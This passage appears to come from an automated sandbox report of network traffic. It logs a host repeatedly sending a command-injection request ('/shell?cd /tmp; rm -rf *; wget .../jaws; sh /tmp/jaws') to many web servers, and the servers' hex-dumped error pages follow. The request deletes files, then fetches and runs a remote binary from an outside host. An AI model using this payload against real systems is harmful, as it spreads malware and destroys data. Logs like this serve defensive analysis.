                                                            Data Ascii: -box;}html[Attributes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top
                                                            Jan 26, 2024 15:32:23.139168978 CET1286INData Raw: 6c 61 73 73 3d 22 70 2d 30 22 3e 0a 20 20 20 20 20 20 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d
                                                            Data Ascii: lass="p-0"> <header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-tran
                                                            Jan 26, 2024 15:32:23.139179945 CET418INData Raw: e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e5 8f af e4 bb a5 e8 81 94 e7 b3 bb e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e5 92 a8 e8 af a2 e5 8e 9f e5 9b a0 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                            Data Ascii: ?</h2> <p></p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            431192.168.2.2351026204.54.40.18380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.522756100 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.288050890 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:25.151916981 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:26.879643917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:30.431140900 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:37.342241049 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:51.164386034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            432192.168.2.2343910104.79.247.5480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.572724104 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.760227919 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 38 36 37 34 32 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 35 34 33 26 23 34 36 3b 33 32 66 64 31 63 63 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;58674217&#46;1706279543&#46;32fd1cc2</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            433192.168.2.234405681.150.7.20780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.587676048 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.790425062 CET507INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 313
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 68 65 6d 61 6e 61 67 65 72 2e 77 65 62 68 6f 74 2e 6c 61 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at themanager.webhot.lan Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            434192.168.2.2333390149.91.88.4780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.589503050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.794075966 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            435192.168.2.2334716134.65.235.16580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.607670069 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.830498934 CET338INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            436192.168.2.234107694.122.206.13580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.629117966 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            437192.168.2.2344892160.124.34.10280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.676383018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.967350960 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:39:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            438192.168.2.2353062119.45.129.20680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.703500032 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:24.021580935 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            439192.168.2.2337134162.0.233.13680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.725294113 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.879163980 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
                                                            Jan 26, 2024 15:32:23.879205942 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                            Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
                                                            Jan 26, 2024 15:32:23.879242897 CET1286INData Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72
                                                            Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
                                                            Jan 26, 2024 15:32:23.879281044 CET1286INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
                                                            Jan 26, 2024 15:32:23.879328012 CET1286INData Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66
                                                            Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
                                                            Jan 26, 2024 15:32:23.879365921 CET1286INData Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33
                                                            Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
                                                            Jan 26, 2024 15:32:23.879404068 CET1096INData Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38
                                                            Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
                                                            Jan 26, 2024 15:32:23.879445076 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to server2.greenworld.network's <a href="mailto:vflex
                                                            Jan 26, 2024 15:32:23.879482985 CET372INData Raw: 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c
                                                            Data Ascii: hm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            440192.168.2.2348658104.101.158.18680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:23.736326933 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.900063992 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Date: Fri, 26 Jan 2024 14:32:23 GMT
                                                            Connection: close
